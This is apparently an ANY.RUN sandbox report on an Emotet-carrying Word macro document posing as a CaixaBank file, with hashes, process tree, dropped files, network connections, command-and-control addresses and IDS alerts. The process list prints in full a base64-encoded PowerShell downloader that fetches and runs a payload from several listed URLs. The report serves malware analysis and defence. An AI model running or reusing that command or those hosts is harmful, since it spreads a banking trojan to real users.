analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

CaixaBank 7150970035345376.doc

Full analysis: https://app.any.run/tasks/fa8b4d41-01a4-4b8b-9b78-d354f477cc77
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: September 19, 2019, 11:27:14
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
trojan
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Triple-buffered New Hampshire, Subject: Ergonomic Wooden Car, Author: Rosina Rowe, Comments: Fall tan, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Sep 19 07:46:00 2019, Last Saved Time/Date: Thu Sep 19 07:46:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0
MD5:

2D46AA86A46A424F66E8A72FF975BBDF

SHA1:

BCCEE59D492C1A5EEEA7BC54B3F2EB03BFEFE2EE

SHA256:

47C0ADBB3E78AA5317BA38CA2DCA6182C468CECD3BC868CFCDC24D3F5434D1CA

SSDEEP:

6144:zXSY2WaPaQxUk+MclQDgQOaPLkI27NSU4jJntATfDeTPsOupth:zCY2WaPaQxUk+MclQDgQO4X27NSU4VeF

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • 572.exe (PID: 2332)
      • 572.exe (PID: 3468)
      • 572.exe (PID: 3344)
      • 572.exe (PID: 4060)
      • easywindow.exe (PID: 2784)
      • easywindow.exe (PID: 3492)
      • easywindow.exe (PID: 2872)
      • easywindow.exe (PID: 3524)
    • Emotet process was detected

      • 572.exe (PID: 2332)
    • Changes the autorun value in the registry

      • easywindow.exe (PID: 3524)
    • EMOTET was detected

      • easywindow.exe (PID: 3524)
    • Connects to CnC server

      • easywindow.exe (PID: 3524)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2516)
    • Executed via WMI

      • powershell.exe (PID: 2516)
    • PowerShell script executed

      • powershell.exe (PID: 2516)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2516)
      • 572.exe (PID: 2332)
    • Application launched itself

      • 572.exe (PID: 4060)
      • easywindow.exe (PID: 2784)
    • Starts itself from another location

      • 572.exe (PID: 2332)
    • Connects to server without host name

      • easywindow.exe (PID: 3524)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3536)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3536)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: Triple-buffered New Hampshire
Subject: Ergonomic Wooden Car
Author: Rosina Rowe
Keywords: -
Comments: Fall tan
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:09:19 06:46:00
ModifyDate: 2019:09:19 06:46:00
Pages: 1
Words: 95
Characters: 547
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Raynor LLC
Lines: 4
Paragraphs: 1
CharCountWithSpaces: 641
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Greenholt
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
10
Malicious processes
8
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs powershell.exe 572.exe no specs 572.exe no specs 572.exe no specs #EMOTET 572.exe easywindow.exe no specs easywindow.exe no specs easywindow.exe no specs #EMOTET easywindow.exe

Process information

PID
CMD
Path
Indicators
Parent process
3536"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\CaixaBank 7150970035345376.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2516powershell -encod JABwADgAMQBUAFkAagBJAEgAPQAnAHoAdQBQADUAUwBVADQAdQAnADsAJABrADQANwBwAHAATQA2AEkAIAA9ACAAJwA1ADcAMgAnADsAJABsADUAMABvAHIAagBZAD0AJwBkADEAaQA5AEUAUABqAEEAJwA7ACQASgBXAFQAcwBtAHMAcgBYAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABrADQANwBwAHAATQA2AEkAKwAnAC4AZQB4AGUAJwA7ACQAZABrAEsANAAyADkAPQAnAFQAVgBUAEsAagBGACcAOwAkAEsAbwBaAFoAOQBLADkAdgA9ACYAKAAnAG4AZQB3ACcAKwAnAC0AbwAnACsAJwBiAGoAZQBjACcAKwAnAHQAJwApACAAbgBFAHQALgB3AGUAYgBDAGwASQBFAE4AVAA7ACQASwBiAEwAagBPAEcAcgB6AD0AJwBoAHQAdABwAHMAOgAvAC8AYQBuAGkAdgBlAG4AdAB1AHIAZQAuAGMAbwAuAHUAawAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBhAGIAeQBPAHIARQBTAEQALwBAAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHMAdAByAHUAYwB0AHUAcgBlAHMALQBtAGEAZABlAC0AZQBhAHMAeQAuAGMAbwAuAHUAawAvAHcAcAAtAGkAbgBjAGwAdQBkAGUAcwAvAEMAUABtAEIAVABtAHQATwAvAEAAaAB0AHQAcABzADoALwAvAG8AZgBmAHMAaQBkAGUAMgAuADAAMAAwAHcAZQBiAGgAbwBzAHQAYQBwAHAALgBjAG8AbQAvAHMAZQBrAGkAbABsAGUAcgAvAHgAQwBWAGwAUAB4AEgAWQAvAEAAaAB0AHQAcABzADoALwAvAHAAcgBhAG0AbwBkAGsAdQBtAGEAcgBzAGkAbgBnAGgALgAwADAAMAB3AGUAYgBoAG8AcwB0AGEAcABwAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAwAHAAagBxAF8AdQBvAGcAcQBqADUANwBoADEALQA1ADEAMQA4ADcAMAA0ADIAOQAwAC8AQABoAHQAdABwADoALwAvAGgAZQBhAGwAdABoAGsAbgBvAHcAbABlAGQAZwBlAC4AbQB5AC8AdwBwAC0AaQBuAGMAbAB1AGQAZQBzAC8AZwBpADcAagBlAGEAbwBsADQAbQBfADAAYwBrAGUAMQBxADAAeQAtADcANgAvACcALgAiAHMAYABwAEwAaQBUACIAKAAnAEAAJwApADsAJABDADMAcABzAEEAdgA9ACcAUwBLAFEAUgB6AEMAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFcARABoAE0AaQA5AGEAIABpAG4AIAAkAEsAYgBMAGoATwBHAHIAegApAHsAdAByAHkAewAkAEsAbwBaAFoAOQBLADkAdgAuACIARABPAGAAdwBOAEwAbwBgAEEAYABkAEYASQBsAGUAIgAoACQAVwBEAGgATQBpADkAYQAsACAAJABKAFcAVABzAG0AcwByAFgAKQA7ACQAVwBkAFMAOQBqAEEASAByAD0AJwBBAGgAcgBZAFEAWQB3ACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJAHQAJwArACcAZQAnACsAJwBtACcAKQAgACQASgBXAFQAcwBtAHMAcgBYACkALgAiAEwAZQBgAE4AZwB0AGgAIgAgAC0AZwBlACAAMgAwADEAMQA0ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAYABUAEEAUgBUACIAKAAkAEoAVwBUAHMAbQBzAHIAWAApADsAJABSAG0ARwB6AFUAOABoAD0AJwBSAE4AVgBpAGEAdQBHAHcAJwA7AGIAcgBlAGEAawA7ACQAQwB2ADkAbwBqAHUAdAA9ACcAdQAzAGoAegAyAEoAaAAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGgAbQBpAGEAXwB0AFEAPQAnAE4AbwBLAGwAaABmAEoANQAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4060"C:\Users\admin\572.exe" C:\Users\admin\572.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3344"C:\Users\admin\572.exe" C:\Users\admin\572.exe572.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3468--fb4ffeeeC:\Users\admin\572.exe572.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2332--fb4ffeeeC:\Users\admin\572.exe
572.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3492"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exe572.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2784"C:\Users\admin\AppData\Local\easywindow\easywindow.exe"C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2872--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exeeasywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3524--fd47f3b8C:\Users\admin\AppData\Local\easywindow\easywindow.exe
easywindow.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Display Control Panel
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
1 769
Read events
1 276
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
10
Text files
0
Unknown types
43

Dropped files

PID
Process
Filename
Type
3536WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9B2B.tmp.cvr
MD5:
SHA256:
3536WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:62F2DA178DD59EBA6B61EE250E55F925
SHA256:8CF938206B83D51659082A32A71F3A9F077217F5A2E07A98541350C60245A244
3536WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\39D4716C.wmfwmf
MD5:C838C0381F846C4469AA926F969BB1CC
SHA256:7C34EF096C1BF2ABF48886700592C9E9F102DA015F0257D04BB225D53EF04A84
3536WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\23BC8AF2.wmfwmf
MD5:3C4950D3835FE5CF6ABD0547E107885E
SHA256:15582AC37617D631DD2BB8E7A7D7923A60D4EA20164C3173052C4AF5405B039A
3536WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9BB165A.wmfwmf
MD5:A9A68F1CF890C61351DB375351918D5E
SHA256:68FBE88F7124F3F5969E320012C44991CB81A9E6AD07468FD9073ABBB3FE4403
3536WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\87A34844.wmfwmf
MD5:7556E8DDEDA7E8A31B71D9BFE6568FA7
SHA256:F78B18DE606AAD9281AA3DB9811711D816537E76E743DDD2B20184299DF8B41A
3536WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7C7017D0.wmfwmf
MD5:92C158D7691CB4B759A8D9BE4597B595
SHA256:5D4C01B42DEE2106E90F64E7506F76459BC794857F65F5B2CD938D042AB40C2C
3536WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:989B0CC17760E029722B08261CCA91C7
SHA256:01407F7415D9EB5AFEEE9634ABECA631E715497CD76B279D692EF5F50911DD84
3536WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2095D2E.wmfwmf
MD5:8B6FD8CE98E0833D8E7B38BE7ED3B9E4
SHA256:175FC3500DDB733E28067B4B1C52D84059592310D31909A2D03CDFF87638536A
3536WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D547AC46.wmfwmf
MD5:C9325DBB5928ED5BC3E274C27F6C4AAC
SHA256:FF565EF02746428ECD13B068520B570D53A631F0BD1AF6E59EC6507A1D42A444
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
12
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2516
powershell.exe
GET
301
104.28.2.238:80
http://healthknowledge.my/wp-includes/gi7jeaol4m_0cke1q0y-76/
US
shared
3524
easywindow.exe
GET
69.43.168.232:443
http://69.43.168.232:443/whoami.php
US
malicious
3524
easywindow.exe
GET
69.43.168.232:443
http://69.43.168.232:443/whoami.php
US
malicious
3524
easywindow.exe
POST
187.147.50.167:8080
http://187.147.50.167:8080/health/
MX
malicious
3524
easywindow.exe
POST
190.18.146.70:80
http://190.18.146.70/iplk/iplk/
AR
malicious
3524
easywindow.exe
POST
200
187.147.50.167:8080
http://187.147.50.167:8080/report/
MX
binary
1.38 Mb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2516
powershell.exe
35.178.150.201:443
www.structures-made-easy.co.uk
Amazon.com, Inc.
GB
unknown
2516
powershell.exe
145.14.145.212:443
offside2.000webhostapp.com
Hostinger International Limited
US
shared
2516
powershell.exe
104.28.18.13:443
aniventure.co.uk
Cloudflare Inc
US
shared
2516
powershell.exe
145.14.144.160:443
pramodkumarsingh.000webhostapp.com
Hostinger International Limited
US
shared
2516
powershell.exe
104.28.2.238:80
healthknowledge.my
Cloudflare Inc
US
shared
2516
powershell.exe
104.28.19.13:443
aniventure.co.uk
Cloudflare Inc
US
shared
3524
easywindow.exe
190.18.146.70:80
CABLEVISION S.A.
AR
malicious
2516
powershell.exe
104.28.2.238:443
healthknowledge.my
Cloudflare Inc
US
shared
3524
easywindow.exe
187.147.50.167:8080
Uninet S.A. de C.V.
MX
malicious
3524
easywindow.exe
69.43.168.232:443
Castle Access Inc
US
malicious

DNS requests

Domain
IP
Reputation
aniventure.co.uk
  • 104.28.18.13
  • 104.28.19.13
malicious
dns.msftncsi.com
  • 131.107.255.255
shared
www.structures-made-easy.co.uk
  • 35.178.150.201
unknown
offside2.000webhostapp.com
  • 145.14.145.212
shared
pramodkumarsingh.000webhostapp.com
  • 145.14.144.160
shared
healthknowledge.my
  • 104.28.2.238
  • 104.28.3.238
unknown

Threats

PID
Process
Class
Message
Not Suspicious Traffic
ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup)
2516
powershell.exe
Not Suspicious Traffic
ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com)
Not Suspicious Traffic
ET INFO Observed Free Hosting Domain (*.000webhostapp .com in DNS Lookup)
2516
powershell.exe
Not Suspicious Traffic
ET INFO Observed SSL Cert for Free Hosting Domain (*.000webhostapp .com)
3524
easywindow.exe
A Network Trojan was detected
AV TROJAN W32/Emotet CnC Checkin (Apr 2019)
3524
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
3524
easywindow.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo/Emotet
6 ETPRO signatures available at the full report
No debug info